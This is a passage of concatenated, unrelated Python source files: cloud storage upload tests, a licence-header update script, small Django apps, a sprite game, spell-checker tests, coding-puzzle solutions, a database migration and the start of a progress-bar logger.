        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(
                stream, length=blob_size, content_settings=content_settings, max_concurrency=2)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
        properties = blob.get_blob_properties()
        self.assertEqual(properties.content_settings.content_type, content_settings.content_type)
        self.assertEqual(properties.content_settings.content_language, content_settings.content_language)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_creat_lrg_blob_frm_stream_chnked_upload_w_props(self, storage_account_name, storage_account_key):
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'creat_lrg_blob.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        content_settings = ContentSettings(
            content_type='image/png',
            content_language='spanish')
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, content_settings=content_settings, max_concurrency=2)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        properties = blob.get_blob_properties()
        self.assertEqual(properties.content_settings.content_type, content_settings.content_type)
        self.assertEqual(properties.content_settings.content_language, content_settings.content_language)
        self._teardown(FILE_PATH)

# ------------------------------------------------------------------------------
# This file is part of Indico.
# Copyright (C) 2002 - 2021 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.

import os
import re
import subprocess
import sys
from datetime import date

import click
import yaml

from indico.util.console import cformat


# Dictionary listing the files for which to change the header.
# The key is the extension of the file (without the dot) and the value is another
# dictionary containing two keys:
#   - 'regex' : A regular expression matching comments in the given file type
#   - 'format': A dictionary with the comment characters to add to the header.
#               There must be a `comment_start` inserted before the header,
#               `comment_middle` inserted at the beginning of each line except the
#               first and last one, and `comment_end` inserted at the end of the
#               header. (See the `HEADER` above)
SUPPORTED_FILES = {
    'py': {
        'regex': re.compile(r'((^#|[\r\n]#).*)*'),
        'format': {'comment_start': '#', 'comment_middle': '#', 'comment_end': ''}},
    'wsgi': {
        'regex': re.compile(r'((^#|[\r\n]#).*)*'),
        'format': {'comment_start': '#', 'comment_middle': '#', 'comment_end': ''}},
    'js': {
        'regex': re.compile(r'/\*(.|[\r\n])*?\*/|((^//|[\r\n]//).*)*'),
        'format': {'comment_start': '//', 'comment_middle': '//', 'comment_end': ''}},
    'jsx': {
        'regex': re.compile(r'/\*(.|[\r\n])*?\*/|((^//|[\r\n]//).*)*'),
        'format': {'comment_start': '//', 'comment_middle': '//', 'comment_end': ''}},
    'css': {
        'regex': re.compile(r'/\*(.|[\r\n])*?\*/'),
        'format': {'comment_start': '/*', 'comment_middle': ' *', 'comment_end': ' */'}},
    'scss': {
        'regex': re.compile(r'/\*(.|[\r\n])*?\*/|((^//|[\r\n]//).*)*'),
        'format': {'comment_start': '//', 'comment_middle': '//', 'comment_end': ''}},
}


# The substring which must be part of a comment block in order for the comment to be updated by the header.
SUBSTRING = 'This file is part of'


USAGE = '''
Updates all the headers in the supported files ({supported_files}).
By default, all the files tracked by git in the current repository are updated
to the current year.

You can specify a year to update to as well as a file or directory.
This will update all the supported files in the scope including those not tracked
by git. If the directory does not contain any supported files (or if the file
specified is not supported) nothing will be updated.
'''.format(supported_files=', '.join(SUPPORTED_FILES)).strip()


def _walk_to_root(path):
    """Yield directories starting from the given directory up to the root."""
    # Based on code from python-dotenv (BSD-licensed):
    # https://github.com/theskumar/python-dotenv/blob/e13d957b/src/dotenv/main.py#L245

    if os.path.isfile(path):
        path = os.path.dirname(path)

    last_dir = None
    current_dir = os.path.abspath(path)
    while last_dir != current_dir:
        yield current_dir
        parent_dir = os.path.abspath(os.path.join(current_dir, os.path.pardir))
        last_dir, current_dir = current_dir, parent_dir


def _get_config(path, end_year):
    config = {}
    for dirname in _walk_to_root(path):
        check_path = os.path.join(dirname, 'headers.yml')
        if os.path.isfile(check_path):
            with open(check_path) as f:
                config.update((k, v) for k, v in yaml.safe_load(f.read()).items() if k not in config)
            if config.pop('root', False):
                break

    if 'start_year' not in config:
        click.echo('no valid headers.yml files found: start_year missing')
        sys.exit(1)
    if 'name' not in config:
        click.echo('no valid headers.yml files found: name missing')
        sys.exit(1)
    if 'header' not in config:
        click.echo('no valid headers.yml files found: header missing')
        sys.exit(1)
    config['end_year'] = end_year
    return config


def gen_header(data):
    if data['start_year'] == data['end_year']:
        data['dates'] = data['start_year']
    else:
        data['dates'] = '{} - {}'.format(data['start_year'], data['end_year'])
    return '\n'.join(line.rstrip() for line in data['header'].format(**data).strip().splitlines())


def _update_header(file_path, config, substring, regex, data, ci):
    found = False
    with open(file_path) as file_read:
        content = orig_content = file_read.read()
        if not content.strip():
            return False
        shebang_line = None
        if content.startswith('#!/'):
            shebang_line, content = content.split('\n', 1)
        for match in regex.finditer(content):
            if substring in match.group():
                found = True
                content = content[:match.start()] + gen_header(data | config) + content[match.end():]
        if shebang_line:
            content = shebang_line + '\n' + content
    if content != orig_content:
        msg = 'Incorrect header in {}' if ci else cformat('%{green!}Updating header of %{blue!}{}')
        print(msg.format(os.path.relpath(file_path)))
        if not ci:
            with open(file_path, 'w') as file_write:
                file_write.write(content)
        return True
    elif not found:
        msg = 'Missing header in {}' if ci else cformat('%{red!}Missing header%{reset} in %{blue!}{}')
        print(msg.format(os.path.relpath(file_path)))
        return True


def update_header(file_path, year, ci):
    config = _get_config(file_path, year)
    ext = file_path.rsplit('.', 1)[-1]
    if ext not in SUPPORTED_FILES or not os.path.isfile(file_path):
        return False
    if os.path.basename(file_path)[0] == '.':
        return False
    return _update_header(file_path, config, SUBSTRING, SUPPORTED_FILES[ext]['regex'],
                          SUPPORTED_FILES[ext]['format'], ci)


def blacklisted(root, path, _cache={}):
    orig_path = path
    if path not in _cache:
        _cache[orig_path] = False
        while (path + os.path.sep).startswith(root):
            if os.path.exists(os.path.join(path, '.no-headers')):
                _cache[orig_path] = True
                break
            path = os.path.normpath(os.path.join(path, '..'))
    return _cache[orig_path]


@click.command(help=USAGE)
@click.option('--ci', is_flag=True, help='Indicate that the script is running during CI and should use a non-zero '
                                         'exit code unless all headers were already up to date. This also prevents '
                                         'files from actually being updated.')
@click.option('--year', '-y', type=click.IntRange(min=1000), default=date.today().year, metavar='YEAR',
              help='Indicate the target year')
@click.option('--path', '-p', type=click.Path(exists=True), help='Restrict updates to a specific file or directory')
@click.pass_context
def main(ctx, ci, year, path):
    error = False
    if path and os.path.isdir(path):
        if not ci:
            print(cformat('Updating headers to the year %{yellow!}{year}%{reset} for all the files in '
                          '%{yellow!}{path}%{reset}...').format(year=year, path=path))
        for root, _, filenames in os.walk(path):
            for filename in filenames:
                if not blacklisted(path, root):
                    if update_header(os.path.join(root, filename), year, ci):
                        error = True
    elif path and os.path.isfile(path):
        if not ci:
            print(cformat('Updating headers to the year %{yellow!}{year}%{reset} for the file '
                          '%{yellow!}{file}%{reset}...').format(year=year, file=path))
        if update_header(path, year, ci):
            error = True
    else:
        if not ci:
            print(cformat('Updating headers to the year %{yellow!}{year}%{reset} for all '
                          'git-tracked files...').format(year=year))
        try:
            for filepath in subprocess.check_output(['git', 'ls-files'], text=True).splitlines():
                filepath = os.path.abspath(filepath)
                if not blacklisted(os.getcwd(), os.path.dirname(filepath)):
                    if update_header(filepath, year, ci):
                        error = True
        except subprocess.CalledProcessError:
            raise click.UsageError(cformat('%{red!}You must be within a git repository to run this script.'))

    if not error:
        print(cformat('%{green}\u2705 All headers are up to date'))
    elif ci:
        print(cformat('%{red}\u274C Some headers need to be updated or added'))
        sys.exit(1)
    else:
        print(cformat('%{yellow}\U0001F504 Some headers have been updated (or are missing)'))


if __name__ == '__main__':
    main()

from django.shortcuts import redirect
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
from paste.models import Paste, Language

@csrf_exempt 
def add(request):
    print "jojo"
    
    if request.method == 'POST':
        language = request.POST['language']
        content = request.POST['content']

        try:
            lang = Language.objects.get(pk=language)
        except:
            print "lang not avalible", language
            lang = Language.objects.get(pk='txt')
   
        paste = Paste(content=content, language=lang)
        paste.save()
        paste = Paste.objects.latest()
        return HttpResponse(paste.pk, content_type='text/plain')
    else:
        return redirect('/api')

#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "wellspring.settings")

    from django.core.management import execute_from_command_line

    execute_from_command_line(sys.argv)

class Sprite(object):
    
    def __init__(self, xPos, yPos):
        self.x = xPos
        self.y = yPos
        self.th = 32
        self.tw = 32
    
    def checkCollision(self, otherSprite):
        if (self.x < otherSprite.x + otherSprite.tw and otherSprite.x < self.x + self.tw
            and self.y < otherSprite.y + otherSprite.th and otherSprite.y < self.y + self.th):
            return True
        else:
            return False

class Actor(Sprite):
    
    def __init__(self, xPos, yPos):
        super(Actor, self).__init__(xPos, yPos)
        self.speed = 5
        self.dy = 0
        self.d = 3
        self.dir = "right"
        # self.newdir = "right"
        self.state = "standing"
        self.walkR = []
        self.walkL = []
    
    def loadPics(self):
        self.standing = loadImage("gripe_stand.png")
        self.falling = loadImage("grfalling.png")
        for i in range(8):
            imageName = "gr" + str(i) + ".png"
            self.walkR.append(loadImage(imageName))
        for i in range(8):
            imageName = "gl" + str(i) + ".png"
            self.walkL.append(loadImage(imageName))
            
    def checkWall(self, wall):
        if wall.state == "hidden":
            if (self.x >= wall.x - self.d and
                    (self.x + 32 <= wall.x + 32 + self.d)):
                return False
    
    def move(self):
        if self.dir == "right":
            if self.state == "walking":
                self.im = self.walkR[frameCount % 8]
                self.dx = self.speed
            elif self.state == "standing":
                self.im = self.standing
                self.dx = 0
            elif self.state == "falling":
                self.im = self.falling
                self.dx = 0
                self.dy = 5
        elif self.dir == "left":
            if self.state == "walking":
                self.im = self.walkL[frameCount % 8]
                self.dx = -self.speed
            elif self.state == "standing":
                self.im = self.standing
                self.dx = 0
            elif self.state == "falling":
                self.im = self.falling
                self.dx = 0
                self.dy = 5
        else:
            self.dx = 0
        self.x += self.dx
        self.y += self.dy

        if self.x <= 0:
            self.x = 0
        if self.x >= 640 - self.tw:
            self.x = 640 -self.tw
    
    def display(self):
        image(self.im, self.x, self.y)


class Block(Sprite):
    
    def __init__(self, xPos, yPos):
        super(Block, self).__init__(xPos, yPos)
        self.state = "visible"
    
    def loadPics(self):
        self.im = loadImage("block.png")
    
    def display(self):
        if self.state == "visible":
            image(self.im, self.x, self.y)
        

# -*- coding: utf-8 -*-
import unittest
from hanspell import spell_checker
from hanspell.constants import CheckResult
from textwrap import dedent as trim


class SpellCheckerTests(unittest.TestCase):
    def setUp(self):
        pass

    def test_basic_check(self):
        result = spell_checker.check(u'안녕 하세요. 저는 한국인 입니다. 이문장은 한글로 작성됬습니다.')

        assert result.errors == 4
        assert result.checked == u'안녕하세요. 저는 한국인입니다. 이 문장은 한글로 작성됐습니다.'

    def test_words(self):
        result = spell_checker.check(u'한아이가 장난깜을 갖고놀고있다. 그만하게 할가?')
        assert result.errors == 4
        
        items = result.words
        assert items[u'한'] == CheckResult.WRONG_SPACING
        assert items[u'아이가'] == CheckResult.WRONG_SPACING
        assert items[u'장난감을'] == CheckResult.STATISTICAL_CORRECTION
        assert items[u'갖고'] == CheckResult.WRONG_SPACING
        assert items[u'놀고'] == CheckResult.WRONG_SPACING
        assert items[u'있다.'] == CheckResult.WRONG_SPACING
        assert items[u'그만하게'] == CheckResult.PASSED
        assert items[u'할까?'] == CheckResult.WRONG_SPELLING

    def test_list(self):
        results = spell_checker.check([u'안녕 하세요.', u'저는 한국인 입니다.'])
        assert results[0].checked == u'안녕하세요.'
        assert results[1].checked == u'저는 한국인입니다.'

    def test_long_paragraph(self):
        paragraph = trim("""
        ubit.info(유빗인포)는 코나미 리듬게임, 유비트의 플레이 데이터 관리 및 열람 서비스입니다. 등록 후에 자신과 친구의 기록을 p.eagate.573.jp에 접속할 필요 없이 본 웹 사이트에서 바로 확인할 수 있습니다.
        등록 후에는 "https://ubit.info/별칭"으로 자신의 개인 페이지가 생성되며 이 주소(별칭)를 아는 사람만 접속할 수 있습니다. 다른 친구에게 기록을 보여주고 싶다면 본인의 인포 주소를 알려주면 됩니다.
        이 사이트는 최신 브라우저 환경만을 제대로 지원합니다. 만약 크롬, 파이어폭스 등의 최신 브라우저 안정버전(stable)을 사용하고 있는데도 페이지 레이아웃이 깨지는 경우 사이트 관리자에게 문의해주세요.
        등록 과정은 간단합니다. 상단 메뉴에서 등록을 클릭한 후 양식에 맞게 입력하시면 자동으로 공개설정이 완료됨과 동시에 유빗인포 계정이 생성됩니다.
        """)

        result = spell_checker.check(paragraph)


if __name__ == '__main__':
    unittest.main()

__author__ = 'brianoneill'

from log_calls import log_calls

global_settings = dict(
    log_call_numbers=True,
    log_exit=False,
    log_retval=True,
)
log_calls.set_defaults(global_settings, args_sep=' $ ')

"""
Given a string that contains only digits 0-9 and a target value, return all possibilities to add binary operators (not
unary) +, -, or * between the digits so they evaluate to the target value.

Examples:
"123", 6 -> ["1+2+3", "1*2*3"]
"232", 8 -> ["2*3+2", "2+3*2"]
"105", 5 -> ["1*0+5","10-5"]
"00", 0 -> ["0+0", "0-0", "0*0"]
"3456237490", 9191 -> []
"""
__author__ = 'Daniel'


class Solution(object):
    def addOperators(self, num, target):
        """
        Adapted from https://leetcode.com/discuss/58614/java-standard-backtrace-ac-solutoin-short-and-clear

        Algorithm:
        1. DFS
        2. Special handling for multiplication
        3. Detect invalid number with leading 0's
        :type num: str
        :type target: int
        :rtype: List[str]
        """
        ret = []
        self.dfs(num, target, 0, "", 0, 0, ret)
        return ret

    def dfs(self, num, target, pos, cur_str, cur_val, mul, ret):
        if pos >= len(num):
            if cur_val == target:
                ret.append(cur_str)
        else:
            for i in xrange(pos, len(num)):
                if i != pos and num[pos] == "0":
                    continue
                nxt_val = int(num[pos:i+1])

                if not cur_str:
                    self.dfs(num, target, i+1, "%d"%nxt_val, nxt_val, nxt_val, ret)
                else:
                    self.dfs(num, target, i+1, cur_str+"+%d"%nxt_val, cur_val+nxt_val, nxt_val, ret)
                    self.dfs(num, target, i+1, cur_str+"-%d"%nxt_val, cur_val-nxt_val, -nxt_val, ret)
                    self.dfs(num, target, i+1, cur_str+"*%d"%nxt_val, cur_val-mul+mul*nxt_val, mul*nxt_val, ret)


if __name__ == "__main__":
    assert Solution().addOperators("232", 8) == ["2+3*2", "2*3+2"]

from django.contrib import admin

from .models import Question


# Register your models here.
admin.site.register(Question)



from django.conf.urls import patterns, include, url

import views

urlpatterns = patterns('',
    url(r'^logout', views.logout, name='logout'),
    url(r'^newUser', views.newUser, name='newUser'),
    url(r'^appHandler', views.appHandler, name='appHandler'),
    url(r'^passToLogin', views.loginByPassword, name='passToLogin'),
    url(r'^signToLogin', views.loginBySignature, name='signToLogin'),
    url(r'^authUserHandler', views.authUserHandler, name='authUserHandler'),
)

import sys

import pytest

from opentracing.ext import tags
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker

from opentracing_instrumentation.client_hooks import mysqldb as mysqldb_hooks
from opentracing_instrumentation.request_context import span_in_context
from .sql_common import metadata, User


SKIP_REASON_PYTHON_3 = 'MySQLdb is not compatible with Python 3'
SKIP_REASON_CONNECTION = 'MySQL is not running or cannot connect'
MYSQL_CONNECTION_STRING = 'mysql://root@127.0.0.1/test'


@pytest.fixture
def session():
    Session = sessionmaker()
    engine = create_engine(MYSQL_CONNECTION_STRING)
    Session.configure(bind=engine)
    metadata.create_all(engine)
    try:
        yield Session()
    except:
        pass


@pytest.fixture(autouse=True, scope='module')
def patch_sqlalchemy():
    mysqldb_hooks.install_patches()
    try:
        yield
    finally:
        mysqldb_hooks.reset_patches()


def is_mysql_running():
    try:
        import MySQLdb
        with MySQLdb.connect(host='127.0.0.1', user='root'):
            pass
        return True
    except:
        return False


def assert_span(span, operation, parent=None):
    assert span.operation_name == 'MySQLdb:' + operation
    assert span.tags.get(tags.SPAN_KIND) == tags.SPAN_KIND_RPC_CLIENT
    if parent:
        assert span.parent_id == parent.context.span_id
        assert span.context.trace_id == parent.context.trace_id
    else:
        assert span.parent_id is None


@pytest.mark.skipif(not is_mysql_running(), reason=SKIP_REASON_CONNECTION)
@pytest.mark.skipif(sys.version_info.major == 3, reason=SKIP_REASON_PYTHON_3)
def test_db(tracer, session):
    root_span = tracer.start_span('root-span')

    # span recording works for regular operations within a context only
    with span_in_context(root_span):
        user = User(name='user', fullname='User', password='password')
        session.add(user)
        session.commit()

    spans = tracer.recorder.get_spans()
    assert len(spans) == 4

    connect_span, insert_span, commit_span, rollback_span = spans
    assert_span(connect_span, 'Connect')
    assert_span(insert_span, 'INSERT', root_span)
    assert_span(commit_span, 'commit', root_span)
    assert_span(rollback_span, 'rollback', root_span)

# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):

    def forwards(self, orm):
        # Deleting model 'Participant'
        db.delete_table(u'pa_participant')

        # Removing M2M table for field user on 'Participant'
        db.delete_table('pa_participant_user')

        # Adding M2M table for field user on 'ReportingPeriod'
        db.create_table(u'pa_reportingperiod_user', (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            ('reportingperiod', models.ForeignKey(orm[u'pa.reportingperiod'], null=False)),
            ('user', models.ForeignKey(orm[u'pa.user'], null=False))
        ))
        db.create_unique(u'pa_reportingperiod_user', ['reportingperiod_id', 'user_id'])


    def backwards(self, orm):
        # Adding model 'Participant'
        db.create_table(u'pa_participant', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('reporting_period', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['pa.ReportingPeriod'])),
        ))
        db.send_create_signal(u'pa', ['Participant'])

        # Adding M2M table for field user on 'Participant'
        db.create_table(u'pa_participant_user', (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            ('participant', models.ForeignKey(orm[u'pa.participant'], null=False)),
            ('user', models.ForeignKey(orm[u'pa.user'], null=False))
        ))
        db.create_unique(u'pa_participant_user', ['participant_id', 'user_id'])

        # Removing M2M table for field user on 'ReportingPeriod'
        db.delete_table('pa_reportingperiod_user')


    models = {
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'pa.activity': {
            'Meta': {'object_name': 'Activity'},
            'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pa.Category']"}),
            'description': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
        },
        u'pa.activityentry': {
            'Meta': {'object_name': 'ActivityEntry'},
            'activity': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pa.Activity']"}),
            'day': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
            'hour': ('django.db.models.fields.IntegerField', [], {}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'slot': ('django.db.models.fields.IntegerField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pa.User']"})
        },
        u'pa.category': {
            'Meta': {'object_name': 'Category'},
            'description': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'grouping': ('django.db.models.fields.CharField', [], {'default': "'d'", 'max_length': '15'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'reporting_period': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pa.ReportingPeriod']"})
        },
        u'pa.profession': {
            'Meta': {'object_name': 'Profession'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '60'})
        },
        u'pa.reportingperiod': {
            'Meta': {'object_name': 'ReportingPeriod'},
            'end_date': ('django.db.models.fields.DateTimeField', [], {}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
            'slots_per_hour': ('django.db.models.fields.IntegerField', [], {}),
            'start_date': ('django.db.models.fields.DateTimeField', [], {}),
            'user': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['pa.User']", 'symmetrical': 'False'})
        },
        u'pa.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'profession': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pa.Profession']", 'null': 'True', 'blank': 'True'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        }
    }

    complete_apps = ['pa']
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Advent of Code 2015 from http://adventofcode.com/2015/day/5
Author: James Walker
Copyrighted 2017 under the MIT license:
  http://www.opensource.org/licenses/mit-license.php
Execution:
  python advent_of_code_2015_day_05.py

--- Day 5: Doesn't He Have Intern-Elves For This? ---

  Santa needs help figuring out which strings in his text file are naughty or
  nice.
  
  A nice string is one with all of the following properties:
    It contains at least three vowels (aeiou only), like aei, xazegov, or 
      aeiouaeiouaeiou.
    It contains at least one letter that appears twice in a row, like xx,
      abcdde (dd), or aabbccdd (aa, bb, cc, or dd).
    It does not contain the strings ab, cd, pq, or xy, even if they are part of
      one of the other requirements.

  For example:
    ugknbfddgicrmopn is nice because it has at least three vowels
      (u...i...o...), a double letter (...dd...), and none of the disallowed
      substrings.
    aaa is nice because it has at least three vowels and a double letter, even
      though the letters used by different rules overlap.
    jchzalrnumimnmhp is naughty because it has no double letter.
    haegwjzuvuyypxyu is naughty because it contains the string xy.
    dvszwmarrgswjxmb is naughty because it contains only one vowel.

  How many strings are nice?
    Answer: 258

--- Day 5: Part Two ---

  Realizing the error of his ways, Santa has switched to a better model of
  determining whether a string is naughty or nice. None of the old rules apply,
  as they are all clearly ridiculous. Now, a nice string is one with all of the
  following properties:

    It contains a pair of any two letters that appears at least twice in the
      string without overlapping, like xyxy (xy) or aabcdefgaa (aa), but not
      like aaa (aa, but it overlaps).
    It contains at least one letter which repeats with exactly one letter
      between them, like xyx, abcdefeghi (efe), or even aaa.

  For example:
    qjhvhtzxzqqjkmpb is nice because is has a pair that appears twice (qj) and
      a letter that repeats with exactly one letter between them (zxz).
    xxyxx is nice because it has a pair that appears twice and a letter that
      repeats with one between, even though the letters used by each rule
      overlap.
    uurcxstgmygtbstg is naughty because it has a pair (tg) but no repeat with a
      single letter between them.
    ieodomkazucvgmuy is naughty because it has a repeating letter with one
      between (odo), but no pair that appears twice.

  How many strings are nice under these new rules?
    Answer: 53
"""


import collections
import os
import re
import sys


TestCase = collections.namedtuple('TestCase', 'input expected1 expected2')


class Advent_Of_Code_2015_Solver_Day05(object):
    """Advent of Code 2015 Day 5: Doesn't He Have Intern-Elves For This?"""

    def __init__(self, file_name=None):
        self._file_name = file_name
        self._puzzle_input = None
        self._solved_output = (
            "The text file had {0} nice strings using the original rules\n"
            "and it had {1} nice strings using the new rules."
        )
        self.__regex_vowels = re.compile('[aeiou]')
        self.__regex_double_char = re.compile('(\w)\\1+')
        self.__regex_naughty = re.compile('ab|cd|pq|xy')
        self.__regex_double_pair = re.compile('(\w{2})\w*\\1')
        self.__regex_triplet = re.compile('(\w)\w\\1')

    def _load_puzzle_file(self):
        filePath = "{dir}/{f}".format(dir=os.getcwd(), f=self._file_name)
        try:
            with open(filePath, mode='r') as puzzle_file:
                self._puzzle_input = puzzle_file.readlines()
        except IOError as err:
            errorMsg = (
                "ERROR: Failed to read the puzzle input from file '{file}'\n"
                "{error}"
            )
            print(errorMsg.format(file=self._file_name, error=err))
            exit(1)

    def __is_nice_string_using_old_rules(self, string):
        return (self.__regex_naughty.search(string) is None
            and len(self.__regex_vowels.findall(string)) > 2
            and self.__regex_double_char.search(string))

    def __is_nice_string_using_new_rules(self, string):
        return (self.__regex_double_pair.search(string)
            and self.__regex_triplet.search(string))

    def _solve_puzzle_parts(self):
        old_nice_count = 0
        new_nice_count = 0
        for string in self._puzzle_input:
            if not string:
                continue
            if self.__is_nice_string_using_old_rules(string):
                old_nice_count += 1
            if self.__is_nice_string_using_new_rules(string):
                new_nice_count += 1
        return (old_nice_count, new_nice_count)

    def get_puzzle_solution(self, alt_input=None):
        if alt_input is None:
            self._load_puzzle_file()
        else:
            self._puzzle_input = alt_input
        old_nice_count, new_nice_count = self._solve_puzzle_parts()
        return self._solved_output.format(old_nice_count, new_nice_count)

    def _run_test_case(self, test_case):
        correct_output = self._solved_output.format(
            test_case.expected1,
            test_case.expected2
        )
        test_output = self.get_puzzle_solution(test_case.input)
        if correct_output == test_output:
            print("Test passed for input '{0}'".format(test_case.input))
        else:
            print("Test failed for input '{0}'".format(test_case.input))
            print(test_output)

    def run_test_cases(self):
        print("No Puzzle Input for {puzzle}".format(puzzle=self.__doc__))
        print("Running Test Cases...")
        self._run_test_case(TestCase(['ugknbfddgicrmopn'], 1, 0))
        self._run_test_case(TestCase(['aaa'], 1, 0))
        self._run_test_case(TestCase(['jchzalrnumimnmhp'], 0, 0))
        self._run_test_case(TestCase(['haegwjzuvuyypxyu'], 0, 0))
        self._run_test_case(TestCase(['dvszwmarrgswjxmb'], 0, 0))
        self._run_test_case(TestCase(['xyxy'], 0, 1))
        self._run_test_case(TestCase(['aabcdefgaa'], 0, 0))
        self._run_test_case(TestCase(['qjhvhtzxzqqjkmpb'], 0, 1))
        self._run_test_case(TestCase(['xxyxx'], 0, 1))
        self._run_test_case(TestCase(['uurcxstgmygtbstg'], 0, 0))
        self._run_test_case(TestCase(['ieodomkazucvgmuy'], 0, 0))
        self._run_test_case(TestCase(['aaccacc'], 1, 1))


if __name__ == '__main__':
    try:
        day05_solver = Advent_Of_Code_2015_Solver_Day05(sys.argv[1])
        print(day05_solver.__doc__)
        print(day05_solver.get_puzzle_solution())
    except IndexError:
        Advent_Of_Code_2015_Solver_Day05().run_test_cases()

#!/bin/env/python
# coding: utf-8

import logging
import os
import time
import uuid
from logging import Formatter
from logging.handlers import RotatingFileHandler
from multiprocessing import Queue
from time import strftime

import dill

from .commands import *
from .processing import MultiprocessingLogger


class TaskProgress(object):
    """
    Holds both data and graphics-related information for a task's progress bar.
    The logger will iterate over TaskProgress objects to draw progress bars on screen.
    """

    def __init__(self,
                 total,
                 prefix='',
                 suffix='',
                 decimals=0,
                 bar_length=60,
                 keep_alive=False,
                 display_time=False):
        """
        Creates a new progress bar using the given information.
        :param total:                       The total number of iteration for this progress bar.
        :param prefix:                      [Optional] The text that should be displayed at the left side of the
                                            progress bar. Note that progress bars will always stay left-aligned at the
                                            shortest possible.
        :param suffix:                      [Optional] The text that should be displayed at the very right side of the
                                            progress bar.
        :param decimals:                    [Optional] The number of decimals to display for the percentage.
        :param bar_length:                  [Optional] The graphical bar size displayed on screen. Unit is character.
        :param keep_alive:                  [Optional] Specify whether the progress bar should stay displayed forever
                                            once completed or if it should vanish.
        :param display_time:                [Optional] Specify whether the duration since the progress has begun should
                                            be displayed. Running time will be displayed between parenthesis, whereas it
                                            will be displayed between brackets when the progress has completed.
        """
        super(TaskProgress, self).__init__()

        self.progress = 0

        # Minimum number of seconds at maximum completion before a progress bar is removed from display
        # The progress bar may vanish at a further time as the redraw rate depends upon chrono AND method calls
        self.timeout_chrono = None
        self.begin_time = None
        self.end_time = None
        self.elapsed_time_at_end = None

        # Graphics related information
        self.keep_alive = keep_alive
        self.display_time = display_time

        self.total = total
        self.prefix = prefix
        self.suffix = suffix
